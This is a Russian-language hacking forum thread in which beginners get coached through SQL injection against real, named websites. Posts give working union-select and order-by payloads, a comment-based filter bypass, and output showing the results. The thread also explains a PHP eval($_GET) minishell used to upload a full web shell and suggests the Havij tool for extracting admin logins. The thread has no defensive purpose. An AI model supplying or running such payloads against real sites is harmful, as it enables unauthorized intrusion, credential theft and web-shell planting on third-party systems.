Ламеры атакуют При попытке подобрать количество полей вот такая ошибка. SELECT * FROM stat WHERE id=1 order by 100000 -- LIMIT 1 failed! Unknown column '100000' in 'order clause' Подскажите пожалуйста в чём проблема.Не судите строго.Новичёк. http://softobzor.com.ua/stat_info.php?id=1'+GROUP+BY+10000+--+
_ttp://softobzor.com.ua/stat_info.php?id=-1 +union+select+1,concat_ws(user(),database(),version()),3,4 --
Подскажите пожалуйста пытаюс раскрутить скулу site.ru/index.php?ID=1+order+by+13 ошибки нету order+by+14 ошибка есть значить колонок 13 Затем ввожу site.ru/index.php?ID=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+ Ошибка.В чём здесь моя ошибка?Спасибо.
неправильно поля подобрал... Вывод можно получить так Code: _ttp://www.greenbergresearch.com/index.php?ID=9/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(Hex(version())),14-- Failed opening '/var/www/html/inc/templates/4.1.12' for inclusion А вообще тема для таких вопросов тут
http://www.greenbergresearch.com/index.php?ID=-1+order+by+15+--+ False http://www.greenbergresearch.com/index.php?ID=-1+order+by+14+--+ True - Not found Значит - Столбцов 14 дальше багбир разъяснил. Суть в том, что нужно было ID не действительный сделать, -1 или 999999999999
Подскажите а вожможно ли залить shell через такую sql уязвимость?И как?Сори за тупой вопрос.Новичёк в этих делах.
Просто не очень понял как при помощи этого кода '<?php eval($_GET[‘e’]) ?>' залить shell. Что за код такой?И как из него может получиться shell?Не не наркоман,просто не могу разобраться вот и спросил.А тему читтал раз 10.Не всё понялю
<?php eval($_GET[‘e’]) ?> давай разжуём подробнее eval - это команда, которая вычисляет/обрабатывает строку как PHP код. Т.е например <? eval("echo \"Test\";") ?> будет равносильно <? echo "Test"; ?>. А $_GET это переменная окружения, которая берёт содержимое из GET переменной, в данном случае переменная "e", т.е test.ru/index.php?e=PHP_Код и если index.php будет содержать '<?php eval($_GET[‘e’]) ?>', то скрипт выполнит код из переменной "e". Это своего рода минишелл, с помощью него можно залить полноценный. Через SQL инекцию ты код не выполнишь, за исключением, если БД поддерживает его, что очень редко. В замен в ней ты узнаешь пароль и логин админки и другие интересные данный, но это не всегда удаётся.. И потом уже через админку льёшь шелл Что касается твоего случая... там вообще 4 ветка БД Мускла, так что таблицы необходимо подбирать, для этого можно воспользоваться спец софтом, тем же говнохавиджом. Тебе он самое то.. З.Ы И судя по твоему нику, ты сам окрещаешь себя как ламера, т.е ты завышаешь свои способности, а сам ничего не умеешь, следовательно можно с большой вероятностью предположить, что ты школьник, без обид. Советую отучится сперва, т.к твой интеллект ещё не развит для уровня логичного понимания запросов
Спасибо за обьяснение.А у хавиджа всегда какая-то ошибка,мутная прога.Школу закончил давно,просто сейчас только решил поковыряться с этим всем.
Странно у меня почти на всех уязвимых сайтах призапуске сканера выскакивает ошибка и после нажатия на ok закрываеться прога.
